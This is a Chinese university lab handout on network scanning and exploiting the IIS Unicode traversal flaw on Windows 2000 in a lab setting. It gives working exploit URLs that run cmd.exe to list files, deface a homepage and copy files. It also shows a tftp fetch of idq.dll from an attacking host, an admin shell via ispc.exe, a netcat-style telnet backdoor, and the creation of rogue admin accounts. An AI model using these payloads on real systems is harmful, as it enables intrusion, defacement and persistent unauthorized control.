实验二 网络扫描与Unicode漏洞.docx

实验二 网络扫描与Unicode漏洞.docx

《实验二 网络扫描与Unicode漏洞.docx》由会员分享，可在线阅读，更多相关《实验二 网络扫描与Unicode漏洞.docx（15页珍藏版）》请在冰豆网上搜索。

实验二网络扫描与Unicode漏洞

实验二网络扫描与Unicode漏洞

实验目的：

1.掌几种网络扫描工具的使用方法及功能；

2.利用扫描出的Unicode漏洞并体验该漏洞的危害。

实验内容及要求：

1．参考以下工具软件及过程，对一台操作系统是Windows2000Server或者是Windows2000AdvancedServer的计算机进行扫描，写扫描报告，并提供图示（ip地址不可与示例中相同），要求如下：

（1）简单描述过程并记录对方用户列表等结果；

（2）记录共享的目录扫描结果；

（3）存在的漏洞扫描结果。

2．参考以下过程，利用扫描出的Unicode漏洞完成以下内容，简单描述过程并图示结果（ip地址不可与示例中相同），要求如下：

（1）利用Unicode漏洞读取系统盘目录；

（2）查看操作系统的类型；

（3）对目标主机web页面的简单修改或删除；

（4）对目标主机的文件（夹）操作方法-拷贝文件。

（5）利用工具软件进一步入侵对方主机，建立一个用户：

hax,密码：

654321，记录入侵过程并截取关键图示。

参考内容：

1.系统用户扫描（案例4-1）

使用工具软件：

GetNTUser，该工具可以在Winnt4以及Win2000操作系统上使用，主要功能包括：

（1）扫描出NT主机上存在的用户名。

（2）自动猜测空密码和与用户名相同的密码。

（3）可以使用指定密码字典猜测密码。

（4）可以使用指定字符来穷举猜测密码。

对IP为172.18.25.109的计算机进行扫描，首先将该计算机添加到扫描列表中，选择菜单File下的菜单项“添加主机”，输入目标计算机的IP地址，如图2-1所示。

可以得到对方的用户列表了。

点击工具栏上的图标，得到的用户列表如图2-2所示。

2.密码破解

利用该工具可以对计算机上用户进行密码破解，首先设置密码字典，设置完密码字典以后，将会用密码字典里的每一个密码对目标用户进行测试，如果用户的密码在密码字典中就可以得到该密码。

一个典型的密码字典如图2-3所示。

步骤一：

设置密码字典

选择菜单栏工具下的菜单项“设置”，设置密码字典为一个文本文件，如图2-4所示。

步骤二：

字典测试

利用密码字典中的密码进行系统破解，选择菜单栏工具下的菜单项“字典测试”，程序将按照字典的设置进行逐一的匹配，如图2-5所示。

3.开放端口扫描（案例4-2）

得到对方开放了哪些端口也是扫描的重要一步。

使用工具软件PortScan可以到得到对方计算机都开放了哪些端口，主界面如图2-6所示。

对172.18.25.109的计算机进行端口扫描，在Scan文本框中输入IP地址，点击按钮“START”，开始扫描如图2-7所示。

4.共享目录扫描（案例4-3）

通过工具软件Shed来扫描对方主机，得到对方计算机提供了哪些目录共享。

工具软件的主界面如图2-8所示。

该软件可以扫描一个IP地址段的共享信息，这里只扫描IP为172.18.25.109的目录共享情况。

在起始IP框和终止IP框中都输入172.18.25.109，点击按钮“开始”就可以得到对方的共享目录了，如图2-9所示。

5.漏洞扫描（案例4-5）

使用工具软件X-Scan-v3.3。

该软件的系统要求为：

Windows9x/NT4/2000。

该软件采用多线程方式对指定IP地址段（（或单机）进行安全漏洞检测，支持插件功能，提供了图形界面和命令行两种操作方式。

扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。

主界面如图2-10所示。

可以利用该软件对系统存在的一些漏洞进行扫描，选择菜单栏设置下的菜单项“扫描参数”，扫描参数的设置如图2-11所示。

可以看出该软件可以对常用的网络以及系统的漏洞进行全面的扫描，选中几个复选框，点击按钮“确定”。

下面需要确定要扫描主机的IP地址或者IP地址段，选择菜单栏设置下的菜单项“扫描参数”，扫描一台主机，在指定IP范围框中输入：

172.18.25.109-172.18.25.109，如图2-12所示。

设置完毕后，进行漏洞扫描，点击工具栏上的图标“开始”，开始对目标主机进行扫描，如图2-13所示。

6．Unicode漏洞扫描

使用扫描工具来检测Unicode漏洞是否存在，使用上一章介绍的X-Scan来对目标系统进行扫描，目标主机IP为：

172.18.25.109，Unicode漏洞属于IIS漏洞，所以这里只扫描IIS漏洞就可以了，X-Scan设置如图4-1所示。

将主机添加到目标地址，扫描结果如图4-2所示。

7.利用Unicode漏洞读取系统盘目录

这个漏洞的可怕之处就在于不需要其他的登陆软件，只要利用浏览器就能达到访问主机信息的目的！

利用该漏洞读取出计算机上目录列表，比如读取C盘的目录，只要在浏览器中输入

“http:

//192.168.1.3/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+dir+c:

\”

利用语句得到对方计算机上装了几个操作系统以及操作系统的类型，只要读取C盘下的boot.ini文件就可以了。

使用的语句是：

http:

//172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+type+c:

\boot.ini

8.利用Unicode漏洞对目标主机修改主页，使用的语句是：

http:

//192.168.1.3/scripts/..%c0%2f../winnt/system32/cmd".exe?

/c+echo+I+love+my+homeland+>c:

\inetpub\wwwroot\default.asp

9.对目标主机的文件（夹）操作方法-拷贝文件

为了是使用方便，利用语句将cmd.exe文件拷贝到scripts目录，并改名为c.exe，使用的语句是：

http:

//172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+copy+C:

\winnt\system32\cmd.exe+c.exe

程序执行结果如图4-5所示。

查看C盘的目录，以后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为：

http:

//172.18.25.109/scripts/c.exe?

/c+dir+c:

\

执行的结果如图4-6所示。

10.进一步控制该主机-利用Unicode漏洞入侵系统

在地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。

利用Unicode可以入侵对方的系统，并得到管理员权限。

首先需要向对方服务器上传一些文件，入侵的第一步，建立tftp服务器，向对方的scripts文件夹传几个文件。

需要上传一个名为“idq.dll”的文件，为了上传这个文件，首先在本地计算机上搭建一个TFTP服务器，普通文件传输协议TFTP（TextFileTransmissionProtocol）一般用来传输单个文件。

使用工具软件tftpd32.exe建立服务器。

将idq.dll和tftpd32.exe放在本地的同一目录下，执行tftpd32.exe程序，主界面如图4-7所示。

这样在本地的TFTP的服务器就建立好了，保留这个窗口，通过该服务器向对方传递idq.dll文件。

在浏览器中执行命令：

“http:

//172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+tftp+-i+172.18.25.110+get+idq.dll”，

命令其实是“tftp–i172.18.25.110getidq.dll”意思是从172.18.25.110服务器上获取idq.dll文件，执行成功的界面如图4-8所示。

查看scripts目录

上传完毕后可以查看一下scripts目录，是否真的上传成功了。

如图4-9所示。

http:

//192.168.1.3/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+dir

说明已经成功的在scripts目录中上传了一个idq.dll文件，下面使用工具软件ispc.exe入侵对方系统。

（另上传一个ncx99）

拷贝ispc.exe文件到本地计算机的C盘根目录，在DOS命令行下执行命令：

“ispc.exe172.18.25.109/scripts/idq.dll”，连接成功后就直接进入了对方的DOS命令行下，而且具有管理员权限，入侵的过程4-10所示。

11.telnet入侵

再使用如下调用来执行ncx99.exe文件

http:

//192.168.1.3/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+c:

\inetpub\scripts\ncx99.exe

此时这个黑客就可以telnet主机了。

telnetx.x.x.x99

可以在对方计算机上做管理员可以做的一切事情，比如添加用户，建立一个用户名为“Hacker123”，密码也是“Hacker123”的用户，如图4-11所示。